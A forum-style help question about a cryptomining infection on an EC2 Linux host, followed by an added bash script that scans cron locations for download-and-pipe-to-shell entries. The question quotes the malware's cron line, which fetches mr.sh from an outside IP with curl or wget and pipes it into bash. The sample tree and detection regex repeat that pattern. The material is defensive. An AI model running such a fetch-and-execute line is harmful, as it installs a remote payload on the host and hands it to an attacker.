For the last few days, I have noticed that applications running on my EC2 Linux instance are very slow. Running the top command showed me that there is a process, /var/tmp/sustse, using most of the CPU.

I killed that process. However, after rebooting the instance, it started running again and using most of the CPU. It is also making cron entries for the following script:

*/30 * * * *    (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh

I googled and found that this is crypto mining malware. I have removed its traces from /var/tmp/ and removed the entries in crontab. However, these entries in crontab seem to be coming back from somewhere, and I couldn't trace the exact location of the script that's making these entries.

I have also cleaned up /var/spool/cron* entries.

I did not find much information online to fix this issue. Any help here would be much appreciated.

Thanks in advance!!

Nikhil_CV
  • 536
Povam
  • 11
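
An added example, not part of the original question: a bash function that lists cron entries of the download-and-pipe-to-a-shell form quoted in the question, across the standard Linux cron locations, under a chosen root (the live system or a mounted snapshot). The function names, the regex and the sample tree (which uses the documentation address 192.0.2.10) are constructed for illustration.

```bash
#!/usr/bin/env bash
# Standard cron locations, relative to the root being scanned.
# var/spool/cron is scanned recursively, so it covers both
# var/spool/cron/<user> and var/spool/cron/crontabs/<user>.
CRON_PATHS="etc/crontab etc/anacrontab etc/cron.d etc/cron.hourly etc/cron.daily etc/cron.weekly etc/cron.monthly var/spool/cron"

# curl or wget followed, on the same line, by a pipe into sh/bash/dash/zsh.
# The trailing (space|end) keeps "| shuf" or "| sha256sum" from matching.
FETCH_PIPE_RE='(curl|wget)[[:space:]].*\|[[:space:]]*(ba|da|z)?sh([[:space:]]|$)'

# scan_cron [ROOT]: print file:line:entry for each suspicious, non-comment entry.
scan_cron() {
    local root="${1:-/}" rel target
    root="${root%/}"
    for rel in $CRON_PATHS; do
        target="$root/$rel"
        [ -e "$target" ] || continue
        grep -rnHE "$FETCH_PIPE_RE" "$target" 2>/dev/null || true
    done | grep -vE '^[^:]+:[0-9]+:[[:space:]]*#' || true
}

# make_sample_tree: build a constructed cron tree for trying the scan offline.
make_sample_tree() {
    local d
    d="$(mktemp -d)"
    mkdir -p "$d/etc/cron.d" "$d/var/spool/cron"
    # Constructed user crontab entry in the same shape as the one in the question.
    printf '%s\n' \
        '*/30 * * * * (curl -s http://192.0.2.10/x.sh||wget -q -O - http://192.0.2.10/x.sh)|bash -sh' \
        > "$d/var/spool/cron/root"
    # Constructed system cron file: a comment, a benign job, and a suspicious job.
    printf '%s\n' \
        '# wget http://192.0.2.10/x.sh | sh' \
        '0 3 * * * root curl -s https://example.com/health | shuf -n1' \
        '*/5 * * * * root wget -q -O - http://192.0.2.10/x.sh | sh' \
        > "$d/etc/cron.d/sample"
    echo "$d"
}

# When run with an argument, scan that root (use / for the live system).
if [ "$#" -gt 0 ]; then
    scan_cron "$1"
fi
```

Running the scan before and after clearing the entries shows which files are being rewritten; reading other users' crontabs under /var/spool/cron requires root.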

0 Answers